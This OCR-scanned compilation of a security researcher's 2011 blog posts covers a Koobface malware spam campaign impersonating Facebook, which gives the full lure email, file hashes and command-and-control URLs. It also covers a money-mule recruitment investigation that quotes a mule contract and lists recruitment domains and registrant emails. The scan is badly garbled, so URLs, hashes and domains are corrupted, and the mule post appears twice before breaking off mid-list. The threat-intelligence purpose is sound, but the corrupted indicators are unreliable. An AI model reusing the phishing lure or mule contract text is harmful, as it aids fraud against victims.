Top Ten Must-Read DDanchev Posts For 2010 (2011- 
01-22 00:25) 

01. [l]How the Koobface Gang Monetizes Mac OS X Traffic 

02. [2]AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop 
from 249 to 181 

03. [3]The DNS Infrastructure of the Money Mule 
Recruitment Ecosystem 

04. [4]The Avalanche Botnet and the TROYAK-AS 
Connection 

05. [5]Koobface Gang Responds to the "10 Things You 
Didn't Know About the Koobface Gang Post" 

06. [6]Sampling Malicious Activity Inside Cybercrime- 
Friendly Search Engines 

07. [7]GazTransitStroy/GazTranZitStroy: From Scarewareto 
Zeus Crimeware and Client-Side Exploits 

08. [8]Dissecting Northwestern Bank's Client-Side Exploits 
Serving Site Compromise 

09. [9]U.S. Treasury Site Compromise Linked to the 
NetworkSolutions Mass WordPress Blogs Compromise 

10. [10]TorrentReactor.net Serving Crimeware, Client-Side 
Exploits Through a Malicious Ad 

This post has been reproduced from [HJDancho Danchev's 
blog. 


1. http://ddanchev.blo as pot.com/2Q10/Q2/how-koobface- 
a an a -monetizes-mac-os-x.html 

2. http://ddanchev.blo as pot.com/201Q/Q3/as5Q215-trovak- 
as-taken-offline-zeus-c.html 

3. http://ddanchev.blo as pot.com/2QlQ/Q4/dns- 
infrastructure-of-monev-mule.html 

4. http://ddanchev.blo as pot.com/2QlQ/Q5/avalanche- 
botnet-and-trovak-as.html 

5. http://ddanchev.blo as pot.com/201Q/Q5/koobface- a an a- 
responds-to-lQ-thin as- vou.html 

6. http://ddanchev.blo as pot.com/201Q/Q7/samplin a- 
malicious-activitv-inside.html 
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7. 

http://ddanchev.blo as pot.com/2QlQ/Q3/ a aztransitstro va aztr 

anzitstrov-from.html 

8. http://ddanchev.blo as pot.com/201Q/Q4/dissectin a- 
northwestern-banks-client.html 

9. http://ddanchev.blo as pot.com/201Q/Q5/us-treasurv-site- 
compromise-iinked-to.html 

10 . 

http://ddanchev.blo as pot.com/2QlQ/Q5/torrentreactornet- 

servin a -crimeware.html 

11. http://ddanchev.blo as pot.com/ 
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Top Ten Must-Read Posts at ZDNet's Zero Day for 
2010 (2011-01-22 12:06) 

01. [l]Seven myths about zero day vulnerabilities 
debunked 

02. [2]Should a targeted country strike back at the cyber 
attackers? 

03. [3]5 reasons why the proposed ID scheme for Internet 
users is a bad idea 

04. [4]Hotmail's new security features vs Gmail's old 
security features 

05. [5]Attack of the Opt-ln Botnets 

06. [6]From Russia with (objective) spam stats 

07. [7]The current state of the crimeware threat - Q &A 

08. [8]Mac OS X SMS ransomware - hype or real threat? 

09. [9] 10 things you didn't know about the Koobface gang 

10. [10]Google-China cyber espionage saga - FAQ 

This post has been reproduced from [ 11 ] Dancho Danchev's 
blog. 

1. http://www.zdnet.com/blo a /securitv/seven-mvths-about- 
zero-dav-vulnerabilities-debunked/7026 

2. http://www.zdnet.com/blo a /securitv/should-a-tar a eted- 
countrv-strike-back-at-the-cvber-attackers/6194 















3. http://www.zdnet.com/blo a /securitv/5-reasons-whv-the- 
proposed-id-scheme-for-internet-users-is-a-bad-idea/ 

6527 

4. http://www.zdnet.com/blo a /securitv/hotmails-new- 
securitv-features-vs- a mails-old-securi tv-features/6509 

5. http://www.zdnet.com/blo a /securitv/attack-of-the-opt-in- 
botnets/6268 
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6. http://www.zdnet.com/blo a /securitv/from-russia-with- 
obi ective-spam-stats/5813 

7. http://www.zdnet.com/blo a /securitv/the-current-state-of- 
the-cnmeware-threat-g-a/5797 

8. http://www.zdnet.com/blo a /securitv/mac-os-x-sms- 
ransomware-h v pe-or-real-threat/5731 

9. http://www.zdnet.com/blo a /securitv/10-thin as- vou-didnt- 
know-abQut-the-koobface- a an a /5452 

10. http://www.zdnet.com/blo a /securit v/a oo a le-china-cvber- 
es piona a e-sa a a-faa/5259 

11. http://ddanchev.blo as pot.com/ 
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Spamvertised "Your password has been stolen!" 
Malware Campaign Circulating (2011-01-26 20:30) 



















































A currently ongoing spamvertised campaign, attempts to 
impersonate the most popular social networking site, 

Facebook. 

Using a well proven "Your password has been stolen!" 
theme, the campaign entices the end user into down¬ 
loading and executing the malware. Social engineering- 
driven campaigns targeting Facebook, remain among the 

popular malware campaign spreading techniques due to the 
ease of execution. 

Subject: Facebook Support. Your password has been stolen! 
ID50888 

Message: Good afternoon. 

A Spam is sent from your FaceBook account. 

Your password has been changed for safety. Information 
regarding your account and a new password is at¬ 
tached to the letter.Read this information thoroughly and 
change the password to complicated one. Please do not 

reply to this email, it's automatic mail notification! Thank 
you for your attention. Your Facebook! 

Spamvertised filedname: Facebook_details_ID76803.zip 
(32,458 bytes) 

Detecrion rate: 

Facebook _details.exe - [l]Trojan- 

Downloader:W32/Koobface.HV - 12/ 43 (27.9 %) 



MD5 : f0e7a8c264fel4562ca8ac98abb35840 

SHA1 : f68dl5e66590c69ac75c46a09ae495be8bbf231f 

SHA256: 

3ca757bfdecbee20ecl0d5af770700041f4bclbl7ee3123f4 

d85acfdl9elbb74 

Upon execution, the sample phones back to: 

Phones back to: 

interviewbuy.ru /forum/document.doc 
interviewbuy.ru /forum/load.php?file=0 
interviewbuy.ru /forum/load.php?file = l 
interviewbuy.ru /forum/load.php?file = 2 
interviewbuy.ru /forum/load.php?file=3 
interviewbuy.ru /forum/load.php?file=4 
interviewbuy.ru /forum/load.php?file = 5 
9 

interviewbuy.ru /forum/load.php?file=6 
interviewbuy.ru /forum/load.php?file=7 
interviewbuy.ru /forum/load.php?file=8 
interviewbuy.ru /forum/load.php?file=9 
interviewbuy.ru /forum/load.php?file=ftpgrabber 
interviewbuy.ru /forum/load.php?file = pokergrabber 



interviewbuy.ru - 91.204.48.96 (AS24965); 
124.217.248.229 (AS45839) Email: 
servmanl976@yandex.ru 

ZeuS crimeware activity at [2]AS24965 (SPOINT-AS 
S.Point LTD) as well as [3]SpyEye malicious activity is 

also observed. 

This post has been reproduced from [4]Dancho Danchev's 
blog. 

1 . 

http://www.virustotal.com/file-scan/report.html? 

id = 3ca757bfdecbee20ecl0d5af770700041f4bclbl7ee312 

3f4d85ac 

fd!9elbb74-12 96061852 

2. https://zeustracker.abuse.ch/mon itor. ph p?as=24965 

3. https://s pve vetracker.abuse.ch/monitor. oh p?as=24965 

4. http://ddanchev.blo as pot.com/ 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Five (2011-01-31 12:58) 

With money mule recruitment continuing to represent the 
most actively used risk-forwarding tactic within the cyber¬ 
crime ecosystem for the purpose of securely distribution 
fraudulently obtained funds, part five of the 11 [l]Keeping 














Money Mule Recruiters on a Short Leash" series are 
here to stay. 

What's particularly interesting about the money mule 
recruitment domain portfolio that I'll expose, is the logi¬ 
cal progression from bogus companies offering financial 
services, to a diverse set of companies occupying multiple 

markets/covering different market segments. 

- Current trends - Localization and 
standardization/template-tization 

A great example of this trend - largely driven by the 

[2]standardization and template-zation of money 
mule 

recruitment sites as a service- is Schwartz & Brothers 
LLC (schwartz-brothers.cc). 

" Schwartz & Brothers LLC is the first choice for artists and 
buyers alike! Schwartz & Brothers LLC is an effective tool 
for the artist and emerging artist to market and promote 
their art in a professional and inexpensive manner. 

We will market your art to the international community of 
art buyers. Whether you are looking to buy or sell original 
art, Schwartz & Brothers LLC is the premier art site for those 
seeking to buy or sell original art online. " 

11 
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From financial services to an entirely new market segment, 
whereas the entire recruitment process remains pretty 


static, excluding several time quality assurance oriented 
details. For instance, every potential mule is required to 

download a entry level job psychological test, which 
surprisingly asks directly whether the mule is from Australia, 

next to automatically choosing Australia as a country of 
origin at a later stage throughout the registration process. 

Moreover, in the context of quality assurance, the recruiters 
also ask the applicant" Are you/were you con¬ 
victed? " in an attempt to combine the survey results with 
other details such the opening date of the bank account, as 
well as the average daily/weekly/monthly amount 
transferred. 

- The Terms of Service 

12 
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11 DUTIES: 

The Contractor undertakes the responsibility to receive 
payments from the Clients of the Company to his personal 

bank account, withdraw cash and to process payments to 
the Company's partners by Western Union or MoneyGram 

money transfer system within one (1) day He/she will report 
directly to the senior manager and to any other party 
designated by the senior manager in connection with the 
performance of the duties under this Agreement and shall 

fulfill any other duties reasonably requested by the 
Company and agreed to by the Contractor. 


CONFIDENTIALITY: 


The Contractor acknowledges that during the engagement 
he will have access to and become acquainted with 

various trade secrets, inventions, innovations, processes, 
information, records and specifications owned or li¬ 
censed by the Company and/or used by the Company in 
connection with the operation of its business including, 

without limitation, the Company's business and product 
processes, methods, customer lists, accounts and 
procedures. 

The Contractor agrees that he will not disclose any of the 
aforesaid, directly or indirectly, or use any of them 

in any manner, either during the term of this Agreement or 
at any time thereafter. AH files, records, documents, 
blueprints, specifications, information, letters, notes, media 
lists, original artwork/creative, notebooks, and similar items 
relating to the business of the Company, whether prepared 
by the Contractor or otherwise coming into his 

possession, shall remain the exclusive property of the 
Company. 
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The Contractor shall not retain any copies of the foregoing 
without the Company's prior written permission. 

The Contractor further agrees that he will not disclose his 
retention as an independent contractor or the terms of this 
Agreement to any person without the prior written consent 
of the Company and shall at all times preserve the 



confidential nature of his relationship to the Company and 
of the services hereunder. 

If the Contractor releases any of the above information to 
any parties outside of this company, such as per¬ 
sonal friend, close relatives or other Financial Institutions 
such as a Bank or other Financial Firms, such could be 
considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be 
released and when, the Contractor will contact their 
superior right away. 

TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of 
thirty-days (30) probationary period. During the 
probationary 

period the Company undertakes to pay to the 
Contractor the base salary amounting to AUD 2300 
per month 

plus 8 % commission from each payment processing 
operation. After the probationary period the 
Company 

agrees to revise and raise the base salary to 3000 
USD. The Company has the right to cancel this Agreement 
at any time within the probationary period or refuse to 
extend it after that, should the Contractor refuse to fulfill 
his/her obligations under this Agreement or fulfills them not 
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 



COMPENSATION: 


The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse 

part of expenses which are incurred in connection with 
money transfer by Western Union or MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 
caused by the Force Majeur circumstances and to apply to 
the 

arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 

damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 



instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 

The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 

registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 

ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 

AIMIC-GROUPLLC.ee - 98.141.220.118 - Email: 
aryan@ppmail.ru 

AMINA-GROUPCO.CO - Email: beige@ca4.ru 
AMINA-GROUPINC.Ce - Email: zowie@yourisp.ru 
AMINAORG.eC - Email: range@ppmail.ru 
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ARPHIS-GOLDGROUP.ee - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.ee - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC.CO - Email: ira@bz3.ru 
AUS-FINANCE.Ce - Email: ours@ca4.ru 


BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: flip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: Iiszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP.CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FINTEC-LTD.CC - Email: w@yourisp.ru 
FINTEC-UK.CO - Email: sons@bz3.ru 



GLEICHFALLS-GROUPINC.CO - Email: tents@ppmail.ru 
l-COMPASS-GROUP.CO - Email: wolf@ca4.ru 
IM-SYSGROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 
JOURNEY-FINANCIAL.CC - Email: Iulu@ca4.ru 
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LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 
MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUP INC. CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.ee - Email: drub@cheapbox.ru 



ON LIN E-SOLUTION SLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.ee - Email: prim@bz3.ru 

PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.ee - Email: spy@yourisp.ru 
RADIUMUK-LTD.ee - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.Ce - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.ee - Email: oozed@bz3.ru 
SILVERSUNGROUP-INC.ee - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.ee - Email: h2o@ca4.ru 
STILE-GROUPLLC.eC - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.ee - Email: cough@ppmail.ru 
TECHADVINe.ee - Email: chance@cheapbox.ru 
TECHADV-INC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 



UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 
USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmail.ru 
Name servers of notice: 

NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: 
ached@yourisp.ru 

NSl.NNSQUE.ee - Email: amok@cheapbox.ru 

NSl.OLIVAU.ee - Email: bop@cheapbox.ru 

NSl.PAGEREDNS.ee - 178.162.152.77 (AS28753) - Email 
freer@free-id.ru 

NSl.SURPLUSUSA.ee - 209.159.156.162 (AS19318) - 
Email: skulk@ppmail.ru 

NSl.TVSILVAU.ee - Email: fact@ppmail.ru 

NSl.UKNSSPACE.ee - 69.10.44.190 (AS19318) - Email: 
gravy@ca4.ru 

nsl.uksource.ee - 69.10.44.189 (AS19318) - Email: 
liver@cheapbox.ru 

NSl.USABONDS.ee - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: 
bold@yourisp.ru 

NS2.COUKSNS.ee - 122.70.148.179 (AS55462) - Email: 
preen@ppmail.ru 
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ns2.gbtrade.cc - 66.199.236.114 (AS15149) - Email: 
ct@yourisp.ru 

NS2.OLIVAU.CC - Email: bop@cheapbox.ru 

NS2.RINGTONS.ee - 66.199.236.115 (AS15149) - Email: 
aaron@cheapbox.ru 

NS2.TVSILVAU.ee - Email: fact@ppmail.ru 

NS2.USAFUNDS.ee - 76.73.47.28 (AS30058) - Email: 
tile@yourisp.ru 

NS2.ZONENSUK.ee - 178.162.181.11 (AS28753) - Email: 
rooms@ppmail.ru 

NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: 
bold@yourisp.ru 

NS3.FOLOWDNS.CC - 178.162.181.11 (AS28753) - Email 
dyed@bz3.ru 

NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: 
skulk@ppmail.ru 

NS3.TVSILVAU.CC - Email: fact@ppmail.ru 

NS3.UKCCONS.CC - 178.162.181.11 (AS28753) - Email: 
ted@cheapbox.ru 

NS3.UKDNS.CC - 66.199.236.116 (AS15149) - Email: 
append@free-id.ru 



ns3.ukearnings.cc - 178.162.181.11 (AS28753) - Email: 
bf@free-id.ru 

ASs of notice using standart nsl;ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy 
Secaucus, NJ 07094 +1.201.605.1425 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to 
transactions inventory" 

With the [4]localization and standardization/template- 
tization of the entire money mule recruitment 
process an every day's reality, quality assurance and 
diversification of the markets/market segments in order to 
increase the 

probability of successful social engineering attack, will start 
taking place. Moreover, the current template driven 

recruitment ecosystem will inevitably start taking 
advantage of basic concepts such as geolocation and 
content 

cloaking, in order to once again increase the probability for 
converting a web site visitor into a mule. 

At an invite-only conference that I attended in September, 
2010, someone from the audience asked me a 

rather interesting question. Does it really matter how many 
mules are recruited by a particular syndicate, and most 



importantly, can we talk about average number of 
days/weeks/hours by the time the mule gets busted, and 
can no 

longer offer his/her services? 

In the long term, we're inevitably going to witness the 
migration from building inventories of mules to transaction- 

driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. 

The number of possible transactions with success rates 
based on historical performance, combined with an infinite 

loop of recruitment is what will drive the entire mule 
recruitment ecosystem. 

Related posts: 

[5] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahool's Web Hosting 

[10] Dissecting an Ongoing Money Mule Recruitment 
Campaign 



[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] lnside a Money Laundering Group's Spamming 
Operations 
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[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 

1. http://ddanchev.blo as pot.com/2010/Q4/keepin a -mone v- 
mule-recruiters-on-short.html 

2. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

3. http://www.zdnet.com/blo a /securitv/inside-indias- 
ca ptcha-solvin a -economv/1835 

4. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 


5. http://ddanchev.blo as pot.com/2010/Q4/dns- 
infrastructure-of-monev-mule.html 
























6. http://ddanchev.blo as DOt.com/201Q/Q4/keepin a -mone v- 
mule-recruiters-on-short.html 
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mule-recruiters-on-short.html 


14. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

15. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-spammin a .html 

16. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

17. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Five (2011-01-31 12:58) 

With money mule recruitment continuing to represent the 
most actively used risk-forwarding tactic within the cyber¬ 
crime ecosystem for the purpose of securely distribution 
fraudulently obtained funds, part five of the " [l]Keeping 
Money Mule Recruiters on a Short Leash" series are 
here to stay. 

What's particularly interesting about the money mule 
recruitment domain portfolio that I'll expose, is the logi¬ 
cal progression from bogus companies offering financial 
services, to a diverse set of companies occupying multiple 

markets/covering different market segments. 

- Current trends - Localization and 
standardization/template-tization 

A great example of this trend - largely driven by the 

[2]standardization and template-zation of money 
mule 

recruitment sites as a service- is Schwartz & Brothers 
LLC (schwartz-brothers.cc). 

" Schwartz & Brothers LLC is the first choice for artists and 
buyers alike! Schwartz & Brothers LLC is an effective tool 
for the artist and emerging artist to market and promote 
their art in a professional and inexpensive manner. 


We will market your art to the international community of 
art buyers. Whether you are looking to buy or sell original 
art, Schwartz & Brothers LLC is the premier art site for those 
seeking to buy or sell original art online. " 
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From financial services to an entirely new market segment, 
whereas the entire recruitment process remains pretty 

static, excluding several time quality assurance oriented 
details. For instance, every potential mule is required to 

download a entry level job psychological test, which 
surprisingly asks directly whether the mule is from Australia, 

next to automatically choosing Australia as a country of 
origin at a later stage throughout the registration process. 

Moreover, in the context of quality assurance, the recruiters 
also ask the applicant" Are you/were you con¬ 
victed? " in an attempt to combine the survey results with 
other details such the opening date of the bank account, as 
well as the average daily/weekly/monthly amount 
transferred. 

- The Terms of Service 
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DUTIES: 


The Contractor undertakes the responsibility to receive 
payments from the Clients of the Company to his personal 

bank account, withdraw cash and to process payments to 
the Company's partners by Western Union or MoneyGram 

money transfer system within one (1) day He/she will report 
directly to the senior manager and to any other party 
designated by the senior manager in connection with the 
performance of the duties under this Agreement and shall 

fulfill any other duties reasonably requested by the 
Company and agreed to by the Contractor. 

CONFIDENTIALITY: 

The Contractor acknowledges that during the engagement 
he will have access to and become acquainted with 

various trade secrets, inventions, innovations, processes, 
information, records and specifications owned or li¬ 
censed by the Company and/or used by the Company in 
connection with the operation of its business including, 

without limitation, the Company's business and product 
processes, methods, customer lists, accounts and 
procedures. 

The Contractor agrees that he will not disclose any of the 
aforesaid, directly or indirectly, or use any of them 

in any manner, either during the term of this Agreement or 
at any time thereafter. All files, records, documents, 
blueprints, specifications, information, letters, notes, media 
lists, original artwork/creative, notebooks, and similar items 



relating to the business of the Company, whether prepared 
by the Contractor or otherwise coming into his 

possession, shall remain the exclusive property of the 
Company 
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The Contractor shall not retain any copies of the foregoing 
without the Company's prior written permission. 

The Contractor further agrees that he will not disclose his 
retention as an independent contractor or the terms of this 
Agreement to any person without the prior written consent 
of the Company and shall at all times preserve the 
confidential nature of his relationship to the Company and 
of the services hereunder. 

If the Contractor releases any of the above information to 
any parties outside of this company, such as per¬ 
sonal friend, close relatives or other Financial Institutions 
such as a Bank or other Financial Firms, such could be 
considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be 
released and when, the Contractor will contact their 
superior right away. 

TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of 
thirty-days (30) probationary period. During the 
probationary 

period the Company undertakes to pay to the 
Contractor the base salary amounting to AUD 2300 
per month 



plus 8 % commission from each payment processing 
operation. After the probationary period the 
Company 

agrees to revise and raise the base salary to 3000 
USD. The Company has the right to cancel this Agreement 
at any time within the probationary period or refuse to 
extend it after that, should the Contractor refuse to fulfill 
his/her obligations under this Agreement or fulfills them not 
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 

COMPENSATION: 

The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse 

part of expenses which are incurred in connection with 
money transfer by Western Union or MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 



caused by the Force Majeur circumstances and to apply to 
the 

arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 

damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 

The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 

registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 

ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 

AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: 
aryan@ppmail.ru 

AMINA-GROUPCO.CO - Email: beige@ca4.ru 



AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
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ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC.CO - Email: ira@bz3.ru 
AUS-FINANCE.CC - Email: ours@ca4.ru 

BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: flip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: Iiszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP.CO - Email: twig@ppmail.ru 
DILIGENC E-GROUP INC. CC - Email: till@cheapbox.ru 


DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FINTEC-LTD.CC - Email: w@yourisp.ru 
FINTEC-UK.CO - Email: sons@bz3.ru 
GLEICHFALLS-GROUPINC.CO - Email: tents@ppmail. 
I-COMPASS-GROUP.CO - Email: wolf@ca4.ru 
IM-SYSGROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 
JOURNEY-FINANCIAL.CC - Email: Iulu@ca4.ru 
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LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 



MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 

MALLOW-GROUP INC. CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ON LIN E-SOLUTION SLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.ee - Email: prim@bz3.ru 
PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.Ce - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.Ce - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.ee - Email: oozed@bz3.ru 



SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.CC - Email: h2o@ca4.ru 
STILE-GROUPLLe.ee - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.ee - Email: cough@ppmail.ru 
TEeHADVINe.ee - Email: chance@cheapbox.ru 
TECHADV-INC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
